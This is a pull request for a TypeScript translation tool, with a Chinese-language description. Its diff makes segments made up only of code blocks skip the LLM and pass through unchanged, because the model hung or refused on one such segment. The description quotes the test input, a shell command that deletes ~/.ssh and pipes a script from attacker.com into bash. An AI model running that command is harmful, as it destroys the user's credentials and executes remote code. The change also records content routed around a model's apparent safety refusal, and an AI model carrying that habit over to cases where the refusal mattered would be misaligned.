### PR TITLE
fix: 纯 code block 段走 literal 绕开 LLM 安全挂起

### DIFF
--- a/src/translate.ts
+++ b/src/translate.ts
@@ -6088,6 +6088,16 @@ function classifyStructuralSegmentDraftStrategy(source: string): StructuralSegme
   if (blocks.length === 0) {
     return null;
   }
+  // Pure-code opt-out: if every block in the segment is a code block, skip
+  // json-blocks entirely and return literal. Full-smoke run observed LLM
+  // hanging (180s timeout) on a segment whose sole content was a fenced code
+  // block with malicious-looking shell commands — the safety gate in the
+  // model appears to refuse to engage at all. Code blocks are not translated
+  // anyway (reconstructJsonBlockDraft already pins them back to source), so
+  // the LLM round-trip adds nothing but risk.
+  if (blocks.every((block) => classifyPromptBlockKind(block.content) === "code")) {
+    return { mode: "literal", value: source };
+  }
   return {
     mode: "json-blocks",
     value: buildJsonBlockDraftPrompt(source),


### PR DESCRIPTION
full smoke chunk 4 seg 4 连续 2 次 180s timeout——该 segment 是纯 fenced code block 含 shell 命令 `rm -rf ~/.ssh && curl http://attacker.com/exfil.sh | bash`，LLM 安全策略拒绝/挂起。改 classifyStructuralSegmentDraftStrategy：全部 block 都是 code 时返回 literal，跳过 LLM round-trip。零新增回归。